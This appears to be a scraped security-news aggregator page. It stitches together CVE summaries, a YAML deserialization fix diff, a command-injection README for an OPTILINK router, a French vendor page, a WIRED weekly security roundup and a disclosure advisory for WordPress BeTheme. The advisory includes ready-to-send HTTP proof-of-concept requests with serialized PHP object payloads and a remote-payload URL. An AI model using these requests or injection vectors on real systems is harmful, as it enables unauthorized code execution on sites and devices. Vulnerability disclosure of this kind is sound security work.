Vulnerability in the HQSwSmiDxe DXE driver on some consumer Acer Notebook devices may allow an attacker with elevated privileges to modify UEFI Secure Boot settings by modifying an NVRAM variable.

CVE-2022-4020

super-xray is a web vulnerability scanning tool. Versions prior to 0.7 assumed trusted input for the program config which is stored in a yaml file. An attacker with local access to the file could exploit this and compromise the program. This issue has been addressed in commit `4d0d5966` and will be included in future releases. Users are advised to upgrade. There are no known workarounds for this issue.

@@ -12,7 +12,9 @@ import com.intellij.uiDesigner.core.Spacer; import org.apache.log4j.LogManager; import org.apache.log4j.Logger; import org.yaml.snakeyaml.LoaderOptions; import org.yaml.snakeyaml.Yaml; import org.yaml.snakeyaml.constructor.SafeConstructor;  
import javax.swing.\*; import javax.swing.border.TitledBorder; @@ -224,7 +226,7 @@ public void reloadConfig(boolean init, boolean reset) { } configTemplate = configStr;  
Yaml yaml = new Yaml(); Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions())); configObj = yaml.load(configStr);  
try { @@ -684,7 +686,7 @@ public void initPluginSave() { }  
public void refreshConfig() { Yaml yaml = new Yaml(); Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions())); StringWriter writer = new StringWriter(); yaml.dump(configObj, writer); configStr = writer.toString();

CVE-2022-41958: yaml rce · 4ra1n/super-xray@4d0d596

TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter command in the setTracerouteCfg function.

CVE-2022-44258

Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

**CVE-2020-23584**

**OPTILINK E-PON "MODEL NO: OP-XT71000N" with "HARDWARE VERSION: V2.2"; & "FIRMWARE VERSION: OP\_V3.3.1-191028"**

Unauthenticated remote code execution on "OPTILINK OP-XT71000N, Hardware Version: V2.2". The issue occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag\_tracert\_admin.asp " in the "PingTest" parameter that leads to command execution.

**TARGET**

/diag\_tracert\_admin.asp

**Attack Vector**

pass arbitrary commands with IP-ADDRESS using " | " to execute commands.

**REGARDS**

Huzaifa Hussain

https://twitter.com/disguised\_noob

https://www.linkedin.com/in/huzaifa-hussain-046791179

CVE-2020-23584: GitHub - huzaifahussain98/CVE-2020-23584: REMOTE CODE EXECUTION

There is a broken access control vulnerability in the Maarch RM 2.8.3 solution. When accessing some specific document (pdf, email) from an archive, a preview is proposed by the application. This preview generates a URL including an md5 hash of the file accessed. The document's URL (https://{url}/tmp/{MD5 hash of the document}) is then accessible without authentication.

**Bienvenue chez Maarch****Nous sommes éditeurs de logiciels ouverts  
spécialisés dans la gestion documentaire****Maarch est un influenceur des usages du numérique  
car nous diffusons largement nos produits.**

**Nos Valeurs**

Depuis notre création en 2004, nous nous sommes fixé des lignes directrices fortes auxquelles nous n'avons jamais cessé de croire :

**Sécurité  
**Suivi des normes ISO 14641-1 et NF Z42-013 , assurance de la non-altération de l’ensemble des ressources.

**Tracabilité  
**Nos logiciels disposent de pistes d’audit fiables et opposables.

**Ouverture  
** Le code de nos logiciels est totalement ouvert, auditable et documenté.

**Innovation**  
Notre équipe R&D travaille au quotidien pour être à la pointe de la technologie.

**Libre & Open Source  
**Logiciels téléchargeables librement et déployés sous licence GNU/GPL v.3

**100 % France  
**Maarch est une entreprise française, du groupe Xelians, implantée en Ile-de-France.

Jean-Louis ERCOLANI  
Fondateur & Directeur Général

**Qui sommes-nous ?**

**Avec 30 employés, Maarch est **une entreprise française à taille humaine située à Nanterre, faisant partie du groupe XELIANS**.**

Depuis 2008, nous avons su faire l’unanimité et séduire de nombreuses **administrations publiques** ainsi que des **grands acteurs du secteur privé.**

L’équipe Maarch est donc composée de spécialistes de l’édition logicielle et de la gestion documentaire en **archivage électronique et gestion du courrier.**

**Nos produits à votre disposition**

Les solutions documentaires pour optimiser le fonctionnement de votre organisation

**Maarch Courrier  
**La solution de gestion de vos courriers professionnels : numérisez, partagez, rédondez, signez et classez.

**Maarch Parapheur**  
Le système de gestion des processus de signature électronique autonome, multimode et interopérable.

**Maarch RM**  
Le système d’archivage électronique pour conserver et exploiter vos ressources numériques en toute conformité.

**Nos services**

Nos équipes vous accompagnent pour faire de chaque projet un véritable succès.

**Support & maintenance**  
Maintenance corrective, évolutive, préventive, adaptative ou réglementaire…

**Intégration**  
Etude préalable  
Ateliers de conception  
Installations SaaS ou OnPremise  
Chaîne de numérisation  
Intégration au SI  
Personnalisation & paramétrage  
Assistance à la recette  
Assistance au démarrage

**Formations**  
Manuels de formation personnalisés  
Formations de formateurs ou d’utilisateurs finaux  
Formation des administrateurs techniques et fonctionnels

**Le code de nos logiciels est totalement ouvert, auditable et documenté.**

Maarch fait le choix du logiciel libre pour **placer l’utilisateur au centre de son processus de développement technico-fonctionnel.** Nous sommes intimement convaincus que la maîtrise parfaite d’un logiciel découle de son ouverture.

De cette façon, notre communauté d’utilisateurs est **totalement libre d’exécuter, de copier, de distribuer, d’étudier, de modifier et d’améliorer nos logiciels,** permettant le développement de fonctionnalités toujours plus proche des usages métiers.

Le caractère libre de nos logiciels est la cerise sur le gâteau : avant tout nous nous efforçons d’en faire les meilleurs dans leur domaine !

Nous utilisons des cookies sur notre site Web pour vous offrir l'expérience la plus pertinente en mémorisant vos préférences et vos visites répétées. En cliquant sur "Accepter tout", vous consentez à l'utilisation de TOUS les cookies. Cependant, vous pouvez visiter "Paramètres des cookies" pour fournir un consentement contrôlé.

CVE-2022-37774: Maarch – Sécurisez vos documents professionnels

After months of meticulous planning, investigators finally move in to catch AlphaBay’s mastermind red-handed. Then the case takes a tragic turn.

The Hunt for the Dark Web’s Biggest Kingpin, Part 5: Takedown

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme 26.5.1.4 PHP Object Injection

The Spacer WordPress plugin before 3.0.7 does not sanitize and escapes some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2022-3618

Plus: Google’s location snooping ends in a $391 million settlement, Russian code sneaks into US government apps, and the World Cup apps set off alarms.

It was a truly wild week in the tech industry as new details emerged about the FTX cryptocurrency exchange's collapse and Elon Musk drove an ever-increasing number of Twitter employees out of the company. Cryptocurrency tracers have been scrambling to understand what happened to nearly half a billion dollars worth of cryptocurrency that was pulled out of FTX last weekend. It seems that some of it may have been seized by government authorities in the Bahamas, but the mystery is still unraveling. 

Meanwhile, the wheels have increasingly been coming off the bus at Twitter. Earlier this week, for example, some users weren't receiving vital two-factor authentication codes sent over SMS, and it's unclear whether the problem has been fully resolved. With its staffing shortages and so much upheaval, we took a look at what the impacts would be if Twitter suffered a massive data breach or another major security attack in this precarious moment.

New research indicates that telehealth sites too often put addiction patient data at risk, with tracking tech lurking on substance-abuse-focused websites. And we've got part four in the series “The Hunt for the Dark Web’s Biggest Kingpin,” which chronicles the rise and fall of dark web marketplace AlphaBay. This installment tells how law enforcement agents in the Dutch National High-Tech Crime Unit took over and ran the dark web marketplace Hansa and follows US and Thai police as they were closing in on AlphaBay's kingpin, Alpha02, on the brink of attempting a dramatic arrest.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

A significant hack-and-leak operation in Moldova has released alleged Telegram correspondence of at least two politicians, leading to scandal and allegations of corruption. The site, called “Moldova Leaks,” has also threatened to release more data on government officials and politicians. The site published alleged messages from Moldova's minister of justice, Sergiu Litvinenco, and defense and national security adviser to the president Dorin Recean in the past two weeks. Some of the conversations imply that other Moldovan officials have won rigged elections or have been installed improperly in their positions, and the leaks particularly seem targeted at undermining anti-corruption officials. Moldova's pro-Russian political opposition has been quick to spread allegations based on the leaks that Litvinenco, Recean, and others must be removed from office. 

The Moldovan Justice Ministry said the leaked data is stolen, but it added that some of it has been manipulated. Litvinenco and other officials in Moldova's government have said that Russia is behind the operation. "The purpose of this fake is to divert the public's attention from the real problems faced by criminal groups in the Republic of Moldova and their connections with foreign services," Litvinenco wrote on Facebook. At the end of October, _The Washington Post_ reported on efforts by Russia's FSB security agency to undermine Moldova's pro-European government.

Google will pay a total of $391.5 million to 40 US states following an investigation related to the tech giant's user location tracking practices. The probe, a collaboration between state attorneys general, looked at whether Google had deceived users and obfuscated its location-tracking activities. “Consumers thought they had turned off their location tracking features on Google, but the company continued to secretly record their movements and use that information for advertisers,” Oregon attorney general Ellen Rosenblum told _The Washington Post_. "We settled an investigation with 40 US state attorneys general based on outdated product policies that we changed years ago,” Google wrote in a blog post about the agreement on Monday. “As well as a financial settlement, we will be making updates in the coming months to provide even greater controls and transparency over location data.”

Thousands of mobile apps in the Google Play and Apple App Store include code modules from a company called Pushwoosh that claims to be based in Washington, DC, but that Reuters reports is actually based in Russia. The Centers for Disease Control and Prevention incorporated Pushwoosh code into seven of its public apps and removed the service after learning of Reuters' findings. The CDC said that it had been misled about where Pushwoosh was headquartered. In March, the US Army also removed an app used by soldiers at a prominent US combat training base because it incorporated Pushwoosh code. In marketing materials and US regulatory filings, the company claims to be based in California, Maryland, or DC, but it actually pays taxes in Russia and is headquartered in Novosibirsk in Siberia. The company apparently had roughly 40 employees and reported revenue of 143,270,000 rubles (about $2.4 million) in 2021. Though it is unclear if Pushwoosh ever abused its position in apps distributed in the US or elsewhere, the Russian government has a track record of conducting “software supply chain” attacks for intelligence gathering as well as destructive attacks on its enemies.

Data and privacy regulators in Norway, France, and Germany have all warned that World Cup attendees should not download Qatar’s two World Cup apps or should do so on a wiped device if necessary. Officials warn that the apps are invasive, collecting significantly more data than they should and more than they claim to in their privacy policies. “One of the apps collects data on whether and with which number a telephone call is made,” Germany’s data protection commission said in an alert this week. “The other app actively prevents the device on which it is installed from going into sleep mode. It is also obvious that the data used by the apps not only remain locally on the device but are also transmitted to a central server.” World Cup events begin this weekend.

A Destabilizing Hack-and-Leak Operation Hits Moldova

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 11 and Nov. 18. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Tag

#acer